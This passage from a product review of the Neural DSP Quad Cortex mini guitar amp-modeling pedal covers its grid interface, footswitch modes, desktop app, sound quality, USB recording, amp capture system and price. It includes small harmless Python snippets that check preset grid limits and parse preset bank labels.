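```python
GRID_LINES = 4
SLOTS_PER_LINE = 8

# Blocks per grid line, in signal order, as described for preset 47B.
annoying_flute = {
    1: ["VCA compressor", "gate", "octave pitch shifter", "envelope filter",
        "EQ", "amp capture", "speaker cabinet"],
    2: ["tape delay", "tape delay"],
    3: ["modulated reverb"],
    4: ["poly octaver", "digital delay"],
}

def validate(preset):
    """Check the preset fits the grid and return the number of slots used."""
    for line, blocks in preset.items():
        if not 1 <= line <= GRID_LINES:
            raise ValueError(f"line {line} is outside the grid")
        if len(blocks) > SLOTS_PER_LINE:
            raise ValueError(f"line {line} holds more than {SLOTS_PER_LINE} blocks")
    return sum(len(blocks) for blocks in preset.values())

used = validate(annoying_flute)
delays = sum("delay" in name
             for blocks in annoying_flute.values() for name in blocks)
print(f"{used} of {GRID_LINES * SLOTS_PER_LINE} slots used, {delays} delays")
```

Even this busy preset fills well under half of the grid under those assumptions.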

And things get even crazier when you use the built-in looper, trigger analog send/return effects, and set up your effects chain with other units meant to be switched on and off during a song.

So much for assigning effects rectangles to the rectangular grid. How to control all of these virtual gadgets? When you tap on any effects unit, up pops an overlay containing (you guessed it) lots of rectangles.

Every controllable parameter gets a rectangle, which is usually filled with a dial or a switch. You can change the values of these dials and switches by touching the screen or by twisting the lower-right rotary footswitch.

Sometimes there are multiple pages of such parameters; the blossom reverb, for instance, has two pages of options and lets you control everything from ducking to pre-delay to modulation to the length of the early reflections. Configuring an entire audio chain from scratch can therefore take a while if you’re a detail freak.

Gig Mode. Yup, it’s rectangles!

Credit: Nate Anderson


When you have your grid set up exactly how you like it (or you’ve customized one of the many built-in presets), you can save your own custom presets and organize them in all sorts of performance-oriented ways.

There’s PRESET mode, which lets you stomp each of the four footswitches to select a completely different preset.

There’s SCENE mode, which lets you use the footswitches to instead choose different parameter sets within the same preset—such as adding a hall reverb, upping the amp gain, and boosting the delay mix level when you come to your big solo.

Then there’s STOMP mode, which operates most like a traditional pedalboard; you step on the various footswitches to turn different effects units in the preset on or off completely.

Finally, there are hybrid modes, which make things even more complex (and can probably be ignored by many users).

To make all this a little easier to grok, there’s something called “Gig View,” which is unintuitively accessed by swiping up from the bottom of the screen. (There is no visual clue that this mode exists or that this is how you access it.) Gig View is essentially four flat—and extremely large—rectangles that take over the entire screen. They show you at a glance what each footswitch will do given the current mode setting.

Creating presets, assigning scenes, and setting up the STOMP mode and Gig View settings can quickly get intricate—even downright confusing (multiple items can sometimes be mapped to the same switch, for instance). I confess that the thought of doing all this through tapping the good-but-not-instantly-reactive touchscreen brought me to despair, until I realized that Neural has built an entire (free) desktop app for Mac and Windows called Cortex Control. Plug in your device over USB and suddenly you can use a nice and very responsive desktop app to do the donkey work of creating and organizing scenes and presets and settings.

I hate downloading stupid one-off apps that clutter up my computer and appear to provide more value to the company making them than they do to me—a serious problem in the current audio engineering world—but Cortex Control is genuinely useful. Indeed, if you’re going to be more than a presets player, I’d call it essential unless you have far more patience than I do. Which you might!

Stomp it

All of this rectangle talk reminds me that the interface largely… works. It may not be gorgeous, but the job gets done, and the desktop app makes the grunt work easier. But I still found the Quad Cortex mini somewhat confusing to navigate after a couple of weeks of intermittent use (though no doubt it gets easier with time).

The device has so many ways of doing things that it can be hard to remember what is needed in each situation. For instance, to make a change, you might use the rotary encoders. You might tap. You might long-tap with different results. You might swipe, drag, or toggle. You might use the footswitches—but results there might vary by mode. Even then, you might need to tap two footswitches at once, while at other times you only need to step on one. And sometimes you need to “long-press” (long-stomp?) two footswitches at once to get the desired result.

Making things worse, numerous items—sometimes quite important items like the Gig View—are not visible or even discoverable.

For instance, the key settings panel that lets you control all the various inputs and outputs on the device does not appear to be accessible from within the overall “settings” menu or anywhere else. Instead, you have to swipe down from the top of the grid screen—again, with no indication that this is where that information lives.

(You have to read the manual to figure out some of these things, which is fine, but the manual also has big gaps, such as not describing what any of the gear actually does nor what any of the settings mean nor how they might be used. For the actual “audio engineering” aspect of the Quad Cortex mini, you’re on your own.)

Something as simple as moving between presets can also be more hassle than you’d expect. Because the Quad Cortex mini only has four footswitches, you can only access four presets at once with a direct stomp. Switching to anything else from the main grid while in PRESET mode appears to require—unless I am missing some obvious shortcut—that you:

  • “Long-stomp” the right two footswitches, after which the preset name starts blinking.
  • At this point, you can tap the left two or the right two footswitches together to move up or down through four-item “banks” of presets.
  • But within each bank, you can only see that bank’s four different presets by tapping on each of the various footswitches.
  • To exit blinking mode and actually select that preset, you need to press its corresponding footswitch again.

This feels like a lot of hassle when you just want to whip through some presets! (Gig View is marginally easier because it at least displays the four presets in each bank at once. Making this whole process more confusing is that it differs depending on which mode you are in.)
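The bank arithmetic behind this is simple enough to sketch. The code below assumes presets are labeled with a bank number plus a slot letter from A to D (as in “47B” above) and that each press of a footswitch pair moves exactly one bank. The function names are hypothetical.

```python
SLOTS = "ABCD"  # four presets per bank, one per footswitch (assumed labeling)

def parse_label(label: str) -> tuple[int, int]:
    """Split a label such as '47B' into (bank number, slot index 0-3)."""
    bank = int(label[:-1])
    slot = SLOTS.index(label[-1].upper())
    return bank, slot

def bank_steps(current: str, target: str) -> int:
    """Signed number of bank moves needed (positive means moving up)."""
    return parse_label(target)[0] - parse_label(current)[0]

print(parse_label("47B"))        # (47, 1)
print(bank_steps("45A", "47B"))  # 2
```

Under those assumptions, getting from 45A to 47B takes at minimum one long-stomp, two bank moves, and a final press to confirm.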

While the processing power and options on offer here are incredible, I do think interface navigation and the modes assignment system could benefit from a rethink and simplification.

The Cortex Control desktop app.


The sound

These quirks can be dealt with, and time (plus the Cortex Control app) should make them easier to manage. The more important question is: How does the Quad Cortex mini sound?

Neural DSP has been one of the leaders in the field of amp and effects modeling for some years now, and it shows. There’s no possible way I could compare all of the models to the original hardware, and I’m not actually interested in doing so. The question for me is simply whether the models sound good when jamming solo or when placed into a mix. On both counts, the answer is a definite yes. This is just a remarkable set of tones to have on hand.

(People as diverse as Dave Mustaine and John Mayer appear to agree, at least for a live rig.)

Once you get over its navigation, playing with this thing is like being a kid in a proverbial candy shop. (Though I, too, love candy shops!) Almost every amp you can imagine is a tap away, and they sound wonderful—though do be aware that what you are getting here is the sound of a recorded amp through a mic and not necessarily an “amp in the room with you.”

Nearly every time I booted it up to test something new, I lost myself in the sound and played far longer than I had intended.

Neural has published a massive and quite helpful list of all the gear on offer here. Bogner Shiva? Marshall? Mesa Boogie? Matchless? Soldano? Vox? Fender? Hiwatt? Amps from all these companies are included. Need a bass amp? There are 13 of those, too. What about a bass overdrive? You get five. A general reverb? How about 17? You get the idea.

You can loop, filter, distort, EQ, delay, and compress to your heart’s content, though there seems to be a bit more emphasis here on rock and metal styles (which Neural DSP is most known for) than on other offerings. Still, there’s enough variety to offer great tools for funk, blues, jazz, and country players. You can even add in a version of the monosynth found in the company’s Rabea plugin.

To illustrate some of the sounds on offer, I wrote a little song about a dirtbag billionaire who makes rockets, gets chased off the Earth by angry locals, and ends up crashing his ship into the Moon out of despair. It’s called “Master of the Universe.”

More to the point, it features 10-plus electric guitar tracks recorded through the Quad Cortex mini using shimmer reverb, the poly octaver, and various crunchy rhythm and lead sounds. (I avoided the metal tones so common in Neural DSP demos.) Bass guitar was likewise recorded through one of the mini’s bass presets.

(For those new to audio production and curious about the other sounds in the track, the drums are the Abbey Road 70s kit, while the rocket-sounding “riser” comes from the Rise and Hit collection, both from Native Instruments. The piano is the recently upgraded “studio piano” that comes in Logic Pro and now sounds surprisingly good! There’s also a Hammond organ emulation and a Rhodes piano emulation from Universal Audio buried in the mix. The double-tracked acoustic guitars during two of the choruses were recorded live in my home studio with a single condenser mic. For room ambience throughout, but especially on the drums, I used Universal Audio’s excellent Sound City Studios plugin.)

I’ve generally found Neural’s plugin tones to be pretty “mix-ready,” and that’s true here as well. Though I often needed to roll off some low end or make an occasional EQ boost or add a bit of reverb to blend the guitars spatially with the drum ambience, little else was required but panning and fader moves.

Frankly, there are probably too many parts in the song, but the Quad Cortex mini was just such a playground of sounds that I kept finding new little bits I wanted to work in. Just be grateful that I talked myself out of using all of the insane pitch-shift effects on my vocal for “special” moments.

“Master of the Universe,” my demo song showing some of what the Quad Cortex mini can do.

Captured

When it comes to recording, you don’t have to worry about wiring this thing up to your audio interface; just connect it to your computer with a USB-C cable, and it becomes a 24-bit, 48 kHz interface. (On Macs, this is class compliant and needs no driver; it even works with iOS devices. Neural makes the necessary driver for Windows.)
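For a rough sense of how much data that involves, the raw audio payload can be worked out directly. The sketch assumes uncompressed PCM with samples packed at exactly 24 bits and all 16 channels mentioned earlier active at once; real USB audio streams add overhead and may pad samples.

```python
def pcm_bits_per_second(sample_rate_hz: int, bit_depth: int, channels: int) -> int:
    """Raw PCM payload: samples per second x bits per sample x channels."""
    return sample_rate_hz * bit_depth * channels

one = pcm_bits_per_second(48_000, 24, 1)
all16 = pcm_bits_per_second(48_000, 24, 16)
print(f"1 channel:   {one / 1e6:.3f} Mbit/s")    # 1.152 Mbit/s
print(f"16 channels: {all16 / 1e6:.3f} Mbit/s")  # 18.432 Mbit/s
```

Even with every channel running, that is a small fraction of the 480 Mbit/s that USB 2.0 high-speed signaling allows.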

The Quad Cortex mini shows up with a host of inputs, making it simple to record, say, both a dry electric guitar track and a heavily effected one at the same time. If you change your mind about the sound later, you can always “re-amp” the dry signal by routing it back out to the device and recording it with different settings. You can even track mics through this thing, thanks to an XLR input and (for condenser mics) support for phantom power.

The Quad Cortex mini can also make its own captures of gear you either own or happen across. This can happen in two ways: 1) on the device or 2) in the cloud.

The device-based system, which the company calls “Neural Capture Version 1,” requires you to hook up your gear to both an output (to play the system’s test tones) and an input on the mini. (Note: Do not, under ANY circumstances, connect the actual speaker outputs from a tube amp directly to the mini. The power level is far too high.)

Various known sounds are then played through this loop, and the mini’s software analyzes the differences between the sound it sent and the sound it received. The machine-learning algorithms for this run locally on the device. Neural says that the Capture 1 system can handle overdrive pedals, amps, and cabs.

The newer system, called Neural Capture Version 2, is “an advanced evolution of Neural Capture trained via Cortex Cloud,” says the company. “This option provides even higher-resolution Captures, making it especially powerful for touch-sensitive devices like fuzzes, compressors, and certain styles of amps.” Capture 2 is said to be capable of modeling “subtle behaviors like volume-knob cleanup, amp sag and bloom, fast transients, and blend controls.”

As the name suggests, the more powerful algorithms behind this system require cloud-based servers instead of the local device. Users are allowed to run 40 Neural Capture 2 sessions per day, and each takes around 10 minutes.

The resulting captures, along with any presets you want to share, can be uploaded to Neural’s cloud service. Once you log in, any captures or presets you choose to download from the site will automatically show up in your Quad Cortex mini.

Look for a follow-up article on what the actual process of making a capture is like; it’s similar across many different modeling devices these days, though the sound of the resulting models can vary by company.

Screenshot of The Cortex Cloud website.


Options

The Quad Cortex mini is a powerful tone platform that is both versatile and expandable. It’s good for solo jamming at home without needing to 1) buy amps, cabs, and effects and 2) crank them to ruinous volume levels. It’s good for playing live, once you have configured its fairly deep control system in a way that works for your particular songs. And it’s good for recording, letting you fiddle with endless gear combinations without running a single patch cable or digging up a 9V battery.

At $1,400, though, it’s bad for your wallet. Whether it’s worth the cost depends on your use case. If you don’t need a screen and are happy with fewer ports and options, you might consider Neural DSP’s smaller and cheaper Nano Cortex ($570) or other devices like the Tonex pedals from IK Multimedia. On the other hand, if you want a larger unit with more footswitches, you can plonk down an extra $400 for the full-fat Quad Cortex or look into various options from Fractal, Kemper, Line 6, etc.

One way of thinking about the financial calculus here would be to try out the device (or listen online) and see how well the sound works for you. Some amp purists believe that nothing beats the sound of real tubes and real speakers in a real room, cost and weight and volume be damned. Many others can’t hear a difference between the models and the originals.

If you’re in the former group, these kinds of devices are unlikely to fully satisfy you, at least when it comes to gigging and recording. So you might decide whether they are “worth it” based solely on their value as easy, light, and quiet practice platforms.

If you can’t tell (or don’t care about) the difference between the models and the real hardware, then these modeling sims start to look like a far better value. When individual amps can go for $1,500 to $2,000 or more, a massive gear collection like the one in the Quad Cortex mini is practically saving you money. You’d be a fool not to buy! (To paraphrase an explanation my son once gave me for a purchase he wanted to make.)

But even those in this group may not need an actual hardware pedal unless they really enjoy practicing without needing to use their regular computer—or unless they gig regularly. If you’re simply a recording guitarist who tends to work “in the box,” you might just pick up some cheaper Neural DSP plugins instead. Or you can buy a more comprehensive software suite like the new Paradise Guitar Studio from Universal Audio or one of the offerings from PolychromeDSP—all of which sound excellent.

If you’re content with software but want a free alternative, take a look at NAM, the Neural Amp Modeler. It’s open source modeling tech that also offers a community tone-sharing website and has been racking up lots of great reviews for its sound quality. (Note that most of the NAM models are static captures; they sound great but represent only that exact setup and knob positioning. The developers are working on more complex, adjustable models.)

All types of users can probably admit, though, that hardware and software modeling tech has made this a great time to be a guitar or bass player. Even if you don’t want to use them on a record, just being able to play around with and get to know this much gear with this much accuracy is a huge win for the home hobbyist and small-time gigging musician, who would otherwise never even set eyes on most of this stuff.

The key thing is just to get whatever works for you… and then to go forth and rock.

Photo of Nate Anderson
